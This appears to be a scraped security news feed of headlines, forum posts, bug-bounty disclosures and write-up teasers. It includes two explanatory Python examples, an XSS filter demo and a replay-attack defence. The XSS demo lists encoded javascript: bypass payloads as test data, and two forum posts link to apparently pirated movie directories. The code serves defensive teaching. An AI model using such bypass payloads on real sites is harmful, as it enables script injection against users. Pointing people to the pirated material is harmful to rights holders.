    People are stubborn creatures; most find it hard to change ingrained thinking patterns after adulthood. From this perspective, selection matters more than training.
    Ukraine in the Shadow of "Large-Scale Hybrid Warfare"
    On the "day the war was to start", the CCTV13 broadcast showed no bloody scenes of large-scale war; both Russia and Ukraine seemed to have fallen silent.
    FreeBuf Morning Report | Ukrainian military institutions and banks hit by cyberattacks; Singapore to roll out strong anti-scam measures
    Starting on the afternoon of 15 February 2022, Ukraine's Ministry of Defence, armed forces and state-owned banks came under DDoS attack.
    Full online and offline coverage! A sneak peek at the "new format" of the CIS 2021 Spring Edition
    Hello to all old and new friends of FreeBuf: the CIS 2021 agenda is here.
    An Embarrassing Slap in the Face: Internet Society Data Leak
    For the body that sets and promotes standards for the internet world and takes advancing the internet as its mission, suffering an information leak caused by a cybersecurity vulnerability is rather embarrassing.
    Yak Basic Plugin Example: CDN Detection
    A content delivery network (CDN) is a system of computer networks interconnected via the internet. This article starts from CDNs and CDN configuration and walks through a Yak basic plugin example in detail.
    New Coffee Ransomware Has an Incubation Period of Up to 100 Days; 360 Decryption Master Exclusively Supports Decryption
    Recently, 360 Security Brain detected that Coffee, a new worm-like ransomware, poses a risk of wide-scale spread.
    Survey Shows Zero Trust Strategies Win Praise from CSOs
    Implementing zero trust is regarded as an effective way to reduce cyber risk.
    Swissport Hit by BlackCat Ransomware Attack
    Swiss airport services company Swissport suffered a ransomware attack that temporarily caused flight delays and service disruptions.
    Ukrainian Banks and Military Institutions Suffered DDoS Attacks
    Yesterday afternoon, Ukraine's Ministry of Defence and armed forces, as well as two of the country's state-owned banks, came under distributed denial-of-service (DDoS) attacks.
    Companies Monitoring Job-Hopping Employees Without Blind Spots? The Lid Can No Longer Be Kept On
    With relevant domestic laws and regulations taking effect and public awareness of privacy protection awakening, the lid can no longer be kept on. Now that it has been lifted, we need to re-examine this issue.

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication among all parties involved. This blog post will focus… Continue reading on Medium »
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report them to improve the cybersecurity posture of an… Continue reading on Medium »

    Windows Privilege Escalation: SpoolFool
    Introduction: Oliver Lyak posted a write-up about a Windows privilege escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print… The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.

    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve the Geolocation 11 practice test on…
    SHODAN is the true Internet search engine — Here’s why
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01-01.exe and Lab01-01.dll. Use the tools and techniques described in the chapter to gain information about…
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces a case study for attack surface analysis and monitoring with practical application of open-source intelligence…
    TryHackMe: Team
    Walk-Through

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems; however, I am trying to download this React app and am having a very hard time. For some reason it is only downloading the index.html page, and when I click on another tab I get "GET /example" Error (404): "Not found". However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework. Any help is much appreciated :) submitted by /u/tokentrader

    An Analysis of the TA2541 Hacker Group
    Translator: Knownsec 404 Lab Translation Team. Original link: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight Key findings: Proofpoint researchers have for years been tracking a persistent cybercriminal actor targeting the aviation, aerospace, transportation, manufacturing and defense industries. The actor consistently uses remote access trojans (RATs), which can be used to remotely control infected machines. The actor focused on...

    Why would a civilian private network be using a public IP range internally for device assignments (a military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their Wi-Fi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public IP range instead of something internal like 192, 172, 10 etc. for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1). Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such as Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee
    Burp Suite certificate question
    I was wondering if anyone has recently done their Burp Suite Practitioner exam cert and how relatable it is to their practice test. Is Burp Suite Pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for Pro to not use it. My work has boxes set up with Pro so my personal license won't be utilized except for the test. submitted by /u/phishingsudo
    Is it possible to route ALL traffic from an iDevice through a VPN?
    I'm somewhat new to iDevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example, when first connected to a Wi-Fi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" Wi-Fi network that supports IPv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc.), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff, and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: (1) Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system-level phone-home initialization stuff, DNS lookups, NTP, etc.) or is this not even the right approach? (2) Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech
    What are my options for an encrypted bootable flash drive containing 2 Linux OSes, selection of which would be done by password alone at the bootloader / pre-boot stage?
    I want an encrypted bootable flash drive which contains 2 Linux OSes. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing. Entering password A should boot OS A. Entering password B should boot OS B. After boot of A, it should not be possible to prove the existence of B. After boot of B, it should not be possible to prove the existence of A. (I.e. if, by booting one of the OSes, it is then possible to see that half the flash drive is 'unallocated', then we have probably failed our task.) You're already thinking 'plausible deniability' is the phrase I'm looking for. Yes, you're right - that's exactly what I want. I want what VeraCrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I don't see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self-study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three-letter agency or military on the resume? submitted by /u/Different-Area-3053
    Forensics Toolkit Recommendations? GCP Linux VM may have been compromised and used for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out at 50%, continuously for the last several days). I immediately took down the machine, snapshotted and imaged it, and rotated all security keys for the GCP account. I don't think there is any nefarious activity and the compromise was likely limited to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually, but I figured there has to be a tool to make this easy. submitted by /u/sidgup

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how do I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost. Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »
    Yet another enumeration of subdomains with statistics
    Or how to collect millions of bug bounty subdomains in order to make a few wordlists. Continue reading on Medium »
    Do You Want to Start Your Career in Cyber Security? Read This.
    Cyber Security: Learn, Hack, Secure. Continue reading on Medium »
    100 Days of Hacking — Day 10
    What’s up guys, it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved; let’s go through today’s objectives and report. Continue reading on Medium »
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB SOLUTIONS
    File upload refers to a user uploading a file to a web server. Web pages ask the user to upload a file in order to… Continue reading on Medium »
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »
    How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3
    A CLI SAST (Static Application Security Testing) tool built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d

    Horizontall HackTheBox Walkthrough
    Introduction: Horizontall is an “easy” rated CTF Linux box on the Hack The Box platform. The box covers initial compromise by exploiting a Strapi RCE vulnerability and… The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »
    Honeypot — Seoul, South Korea (Threat Analysis)
    Hello! Continue reading on Medium »
    TryHackMe Sakura Room CTF Write-Up
    My weird, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »
    Hacktoria: Geolocation 13 (Walkthrough)
    Continue reading on Medium »

    Work From Home Productivity Tips
    For many of us, working from home is here to stay, but it does come with its own challenges. This article contains some of the best tips and tricks from TrustedSec consultants on how to stay focused at home. Set an alarm to start and stop working: alarms can be set in shorter intervals, to... The post Work From Home Productivity Tips appeared first on TrustedSec.

    SecWiki News 2022-02-15 Review
    The Ultimate Java Deserialization Payload Shrinking Technique, by ourren; Interpretable Machine Learning for Solving Cybersecurity Problems, by ourren; Starting from a Pegasus False Positive, by Avenger; Some Thoughts on Bypassing Taint Analysis, by ourren; 2021 Online Financial Black-Market Research Report, by ourren. For more of the latest articles, visit SecWiki.

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a USB device using FTK Imager (on a Windows system) and dd from the SIFT workstation (Linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it myself and they were the same. I have a few questions: 1. Why is the hash of the same device different on FTK (running on Windows) and when checking on the SIFT Workstation (Linux)? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers; I did not use one while imaging. Could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04
    Overview of Autopsy data artifacts, analysis results, and reporting. Part 2 of the Autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience
    iCloud forensics
    Does anyone have any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools? submitted by /u/Techn0prince
    ENCE Certification
    Hi all, my EnCE cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards e-discovery and not so much digital forensics, so I may struggle to get aid from my employer re: training and financing. Anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol

    New Emotet Infection Method
    A new Emotet infection method uses an obfuscated Excel 4.0 macro that, when activated, leads to the retrieval and execution of the final Emotet payload. The post New Emotet Infection Method appeared first on Unit42.

    Interview with Jidun Technical Director Zheng Dongdong: What Can the Much-Hyped XDR Bring to Enterprises?
    Where exactly does the appeal of XDR security technology lie, and which hard problems can the much-anticipated XDR technology solve?
    FreeBuf Morning Report | US critical infrastructure organizations hit by ransomware again; ECB asks banks to strengthen cyber defenses
    As the Ukraine crisis intensifies, the European Central Bank has warned banks that they may face Russia-linked cyberattacks and asked them to strengthen their cyber defenses.
    2021 Online Financial Black-Market Research Report
    With the new wave of fintech development and industry transformation, the financial sector has accelerated its digital transformation. Flexible and convenient financial business models deliver better services to users, but also face constantly evolving new attack threats from the criminal underground.
    A US Company Exposed Data on 7 Million Users
    An insecure Amazon S3 bucket contained personal data on roughly 7 million people.
    Sports Brand Mizuno Hit by Ransomware Attack, Delaying Orders
    Sports equipment and apparel brand Mizuno suffered a ransomware attack on 4 February. The attack caused serious disruption to the company's business.
    Europe's Largest Car Dealer Hit by Ransomware, Google Issues Emergency Fix for Zero-Day | Global Cybersecurity Hotspots, 15 February
    Emil Frey, one of Europe's largest car dealers, was hit by a ransomware attack last month; the Swiss company appeared on the Hive ransomware victim list on 1 February.
    Announcement on the Adjustment of the Event Format for the CIS 2021 Spring Edition
    Combining new offline and online formats, the CIS 2021 Spring Edition looks forward to seeing you.
    Cybersecurity Review Measures Take Effect Today; Platforms Holding Data on Over a Million Users Must Undergo Review Before Listing Abroad
    The newly revised Cybersecurity Review Measures center on the supply-chain security of critical information infrastructure, with a focus on strengthening attention to and regulation of data security.
    Google Chrome Issues Emergency Fix for a Zero-Day Exploited in Attacks
    Google released Chrome for Windows, Mac and Linux to fix a high-severity zero-day vulnerability used by threat actors in attacks.
    CISA Adds 15 New Vulnerabilities to Its Known Exploited Vulnerabilities Catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) has added another 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog.
    FBI: BlackByte Ransomware Has Breached US Critical Infrastructure
    The FBI and the US Secret Service issued a joint cybersecurity advisory showing that the BlackByte ransomware group breached at least three US critical infrastructure entities in the past three months.

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in a conversation, the metaData can be manipulated to open an arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900

    JDBC Connection URL Attacks
    Author: su18. This article is a reader submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org When a JDBC connection URL is controllable, what impact can it have? Several related attack methods were disclosed a long time ago, but I had never studied them; when the video of the HITB2021SIN talk "Make JDBC Attacks Brilliant Again" was uploaded to Y...
    RedLine Stealer Disguised as a Windows 11 Upgrade Steals User Information
    Translator: Knownsec 404 Lab Translation Team. Original link: https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ Attackers are always looking for topical lures to trick victims into infecting their systems. We recently analyzed one such lure: a fake Windows 11 installer. On 27 January 2022, which was when the Windows 11 upgrade...

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    http://162.12.215.254/Data/ I was looking for the movies, and the English ones are mostly good quality, and without any burned-in subs or forced dual languages. Sorry if repost. Found searching "English" in the search box with "video" in the ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep
    First contribution
    https://who.4386.ltd/Doctor/ I think all Marvel files are in 4K. There are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in Chinese, so let Chrome translate the page first. submitted by /u/CompetitiveMango12

    TryHackMe Principles of Security
    Hello, amazing hackers! In this blog you are going to see about principles of security.
    Pentesting Fundamentals TryHackMe
    Hi, amazing hackers! Today I come up with another interesting topic on TryHackMe, which is Pentesting Fundamentals.
    Hacking Wordle
    How to guess the word of the day through reverse engineering. Continue reading on InfoSec Write-ups »
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period, so I had a lot of free time. Anyways…
    How I was able to take over any account via the Password Reset Functionality.
    Hey, this is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (my research partner on this topic, Anil, and I) found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss how to bypass endpoints. Before moving further, let’s take a quick glance at endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, JavaScript is a weakly typed language. This feature of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
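The entry above on XSS and HTML encoding makes a point that is easiest to see in code: the browser decodes HTML character references inside an attribute value before it uses the value, so a filter that scans the raw markup for the string javascript: is bypassed by encoding a single character. The Python below is an added example, not code from that article or from any library it mentions; it contrasts a naive substring check with a check that first mimics what the browser does (decode entities, strip surrounding controls and embedded tab/newline, which the URL parser removes) and then allowlists the URL scheme. The attribute values in SAMPLES are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Schemes an href/src attribute may carry; "" covers relative URLs.
SAFE_SCHEMES = {"", "http", "https", "mailto"}

# C0 controls and space: the URL parser strips these from both ends of its input.
_LEADING_TRAILING = "".join(chr(c) for c in range(0x21))


def naive_allows(raw_attr: str) -> bool:
    """A filter that looks for the literal string in the raw markup.

    This never sees what the browser sees, because character references
    inside the attribute value are not decoded before the comparison.
    """
    return "javascript:" not in raw_attr.lower()


def browser_view(raw_attr: str) -> str:
    """Approximate the value the browser hands to its URL parser.

    1. Decode HTML character references (&#106; -> 'j', &#x09; -> TAB, ...).
    2. Strip leading/trailing C0 controls and spaces.
    3. Remove every embedded TAB, LF and CR, as the URL parser does.
    """
    value = html.unescape(raw_attr)
    value = value.strip(_LEADING_TRAILING)
    for ch in "\t\n\r":
        value = value.replace(ch, "")
    return value


def strict_allows(raw_attr: str) -> bool:
    """Decode the way the browser does, then allowlist the scheme."""
    scheme = urlsplit(browser_view(raw_attr)).scheme.lower()
    return scheme in SAFE_SCHEMES


def classify(raw_attr: str) -> dict:
    """Return both verdicts plus the decoded value, for inspection."""
    return {
        "raw": raw_attr,
        "browser_sees": browser_view(raw_attr),
        "naive_allows": naive_allows(raw_attr),
        "strict_allows": strict_allows(raw_attr),
    }


# Constructed attribute values for the demo; none come from a real site.
SAMPLES = [
    "javascript:alert(1)",                            # both filters reject
    "&#106;avascript:alert(1)",                       # naive filter bypassed
    "jav&#x09;ascript:alert(1)",                      # embedded TAB, naive filter bypassed
    "https://example.com/?next=javascript:void(0)",   # naive filter false positive
    "/account/settings",                              # relative URL, allowed by both
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```

The decode step is the whole point: any check on an attribute value has to run on the decoded form, and a scheme allowlist is more robust than a denylist of strings because it also stops data: and vbscript: without adding patterns.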
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access to this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured iptables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
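The post above asks for something lightweight against replay of a command stream. The Python below is an added example, not the poster's setup or any tool named in the thread; it shows the minimum that actually stops replay: every command carries a strictly increasing sequence number and an HMAC over (direction label, sequence number, command) under a pre-shared key, and the receiver verifies the tag before it will even look at the counter. The key and the "turn left" command stream are constructed for the demo; a real deployment provisions 32 random bytes out of band on both ends.

```python
import hashlib
import hmac
import struct


class ReplayError(Exception):
    """Raised for any frame that must not be acted on."""


class CommandChannel:
    """One direction of an authenticated, replay-resistant command link.

    Wire frame: 8-byte big-endian sequence number || command || 32-byte tag,
    where tag = HMAC-SHA256(key, direction || seq || command).
    Binding the direction label into the tag means a frame captured on the
    vehicle->client leg cannot be replayed on the client->vehicle leg.
    """

    SEQ_LEN = 8
    TAG_LEN = 32

    def __init__(self, key: bytes, direction: bytes):
        if len(key) < 32:
            raise ValueError("use a key of at least 32 random bytes")
        self.key = key
        self.direction = direction
        self.next_seq = 1   # sender state: next sequence number to emit
        self.last_seq = 0   # receiver state: highest sequence number accepted

    def _tag(self, seq: int, command: bytes) -> bytes:
        msg = self.direction + struct.pack(">Q", seq) + command
        return hmac.new(self.key, msg, hashlib.sha256).digest()

    def seal(self, command: bytes) -> bytes:
        """Sender side: number the command and append its tag."""
        seq = self.next_seq
        self.next_seq += 1
        return struct.pack(">Q", seq) + command + self._tag(seq, command)

    def open(self, frame: bytes) -> bytes:
        """Receiver side: authenticate first, then enforce strict ordering."""
        if len(frame) < self.SEQ_LEN + self.TAG_LEN:
            raise ReplayError("frame too short")
        seq = struct.unpack(">Q", frame[:self.SEQ_LEN])[0]
        command = frame[self.SEQ_LEN:-self.TAG_LEN]
        tag = frame[-self.TAG_LEN:]
        # Check the tag before touching last_seq, so unauthenticated junk
        # can never advance the counter; compare_digest avoids timing leaks.
        if not hmac.compare_digest(tag, self._tag(seq, command)):
            raise ReplayError("bad tag")
        if seq <= self.last_seq:
            raise ReplayError("replayed or out-of-order frame")
        self.last_seq = seq
        return command


def demo() -> dict:
    """Drive a constructed command stream through the channel and record verdicts."""
    # Constructed demo key; a real deployment provisions 32 random bytes out of band.
    key = hashlib.sha256(b"constructed demo key, not for real use").digest()
    client_tx = CommandChannel(key, b"client->vehicle")
    vehicle_rx = CommandChannel(key, b"client->vehicle")
    vehicle_tx = CommandChannel(key, b"vehicle->client")

    def attempt(frame: bytes) -> str:
        try:
            return vehicle_rx.open(frame).decode()
        except ReplayError as exc:
            return f"rejected: {exc}"

    first = client_tx.seal(b"turn left")
    second = client_tx.seal(b"turn left")   # same command, new sequence number
    return {
        "first": attempt(first),
        "second": attempt(second),
        # The attacker re-sends a captured frame verbatim.
        "replay": attempt(first),
        # The attacker edits the command (same length) but cannot recompute the tag.
        "tampered": attempt(second[:8] + b"turn rite" + second[-32:]),
        # The attacker reflects the vehicle's own acknowledgement back at it.
        "reflected": attempt(vehicle_tx.seal(b"ack")),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:9s} {verdict}")
```

This gives integrity and replay resistance, not confidentiality; if the commands themselves are sensitive, run it inside TLS or IPsec (IPsec ESP already carries an anti-replay window of its own, so once the VPN route works this layer is redundant). Both counters must survive a reboot: if the Arch box restarts with last_seq at zero, every frame captured in the previous session becomes replayable, and if the sender restarts at one its new frames are rejected until it passes the old high-water mark.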
    Alienvault OSSIM OTX Issue
